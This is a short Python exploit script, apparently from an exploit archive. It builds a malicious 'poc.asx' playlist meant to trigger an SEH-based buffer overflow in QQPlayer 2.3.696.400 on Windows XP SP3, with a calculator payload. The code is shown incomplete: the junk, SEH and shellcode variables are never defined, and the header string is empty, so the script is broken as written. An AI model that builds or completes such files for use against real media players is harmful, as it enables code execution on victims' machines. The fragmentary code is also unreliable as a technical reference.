################################################################# # # Title: QQPlayer asx File Processing Buffer Overflow Exploit # Author: Li Qingshan of Information Security Engineering Center,School of Software and Microelectronics,Peking University # Vendor: www.qq.com # Platform: Windows XPSP3 Chinese Simplified # Test: QQPlayer 2.3.696.400 # Vulnerable: QQPlayer<=2.3.696.400p1 # Payload = calc # ################################################################# # Code : head =''' ''' payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot fobj = open("poc.asx","w") fobj.write(payload) fobj.close()